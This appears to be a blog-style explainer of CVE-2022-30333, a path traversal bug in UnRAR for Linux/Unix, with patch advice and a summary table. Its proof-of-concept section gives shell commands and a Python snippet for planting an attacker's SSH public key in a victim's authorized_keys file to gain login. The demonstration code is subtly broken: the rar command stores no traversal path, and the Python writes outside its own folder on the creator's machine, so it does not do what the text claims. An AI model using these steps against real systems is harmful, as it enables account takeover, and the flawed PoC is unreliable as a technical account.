CVE-2022-30333 is a critical security vulnerability found in RARLAB’s UnRAR utility (before version 6.12) running on Linux and UNIX-like systems. This bug can let attackers overwrite files outside the intended extraction directory by crafting a malicious RAR archive, potentially letting them place files like ~/.ssh/authorized_keys. This could allow unauthorized SSH logins to the targeted account!
> Note: WinRAR for Windows and the RAR app for Android are NOT affected.
What is UnRAR and Why Does It Matter?
UnRAR is a command-line tool made by RARLAB, used to extract .rar files on Unix and Linux. This tool is widely used — sometimes called from backend scripts or even mail scanners — which means if it’s exposed, it could spell big trouble.
The Vulnerability: Directory Traversal
Path traversal (or directory traversal) is a type of security error where software fails to sanitize file paths, letting attackers inject things like ../ (dot-dot-slash) into file names. This tricks the program into writing files *outside* the intended folder.
For UnRAR before 6.12, it was possible to craft a .rar archive where a file’s path included sequences such as:
../../.ssh/authorized_keys
When extracted, UnRAR would happily create or overwrite the victim’s SSH keys—yikes.
Proof of Concept: Crafting & Using the Malicious RAR
If you want to see a simple demo (for educational purposes only!), here’s how such an attack could look.
Suppose we want to "plant" an SSH key for a user named victim. First, make a file structured as
../../home/victim/.ssh/authorized_keys
Put a line you control inside (e.g., your SSH public key).
2. Create a malicious RAR archive
RARLAB’s own RAR tool lets you make a RAR archive with this file structure. For now, let’s mock it with a simple example using the rar command line tool:
# Prepare the directory structure
mkdir -p malicious_dir/home/victim/.ssh
echo "ssh-rsa AAAAB3Nza... attacker@evil" > malicious_dir/home/victim/.ssh/authorized_keys
# Create the RAR with relative paths
cd malicious_dir
rar a ../../evil.rar home/victim/.ssh/authorized_keys
cd ..
This will nest the file structure inside the RAR archive so that, when unpacked, UnRAR might process the traversal paths.
3. Extract with a VULNERABLE UnRAR
Assume the vulnerable UnRAR is on the target and you send them (or get an automated process to use) evil.rar:
unrar x evil.rar /tmp/target_dir
With CVE-2022-30333, UnRAR may interpret the ../../ path and write the authorized_keys file to /home/victim/.ssh/authorized_keys, even though the extraction directory was /tmp/target_dir.
4. Gain Access
If the target is running SSH and does not use additional restrictions on authorized keys, you may now SSH as victim using your injected key!
A sample exploit script and further analysis are available here
- Official RARLAB UnRAR Advisory
- HackerOne Report and Exploit (via SonarSource)
- Debian/LTSA Security Tracker
- Exploit in the wild (GitHub gists examples)
Example PoC Code Snippet (Python + UnRAR)
Here’s a minimal PoC using Python to generate a malicious RAR (note: rare case you need a rar creator):
import os
payload_path = "../../home/victim/.ssh/authorized_keys"
ssh_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... attacker@evil"
os.makedirs("exploit_dir", exist_ok=True)
with open(f"exploit_dir/{payload_path}", "w") as f:
f.write(ssh_key)
# Now you must use the RAR tool to package the structure.
# rar a exploit.rar exploit_dir/*
Download updated binaries or sources here
- RARLAB UnRAR Downloads
For admins: always verify archives before automatic extraction, and don’t use UnRAR with root or privileged users.
Summary Table
| Thing | Details |
|---------------------|-----------------------------------------|
| CVE | CVE-2022-30333 |
| Affected Version | UnRAR before 6.12, Linux/Unix |
| Attack Type | Path Traversal (Directory Traversal) |
| Impact | File overwrite/creation, possible RCE |
| Fixed In | UnRAR 6.12 |
| Windows/Android | NOT affected |
Conclusion
CVE-2022-30333 is a classic but very dangerous path traversal bug in RARLAB’s UnRAR for Linux/Unix. It’s a loud reminder to keep your tools up to date and never trust file paths blindly. If you run UnRAR anywhere, patch it NOW and audit your history for suspicious archives!
References
- RARLAB official fix
- SonarSource Blog: Full Analysis
- Debian Tracker - CVE-2022-30333
- Exploit Gist
Timeline
Published on: 05/09/2022 08:15:00 UTC
Last modified on: 08/05/2022 17:15:00 UTC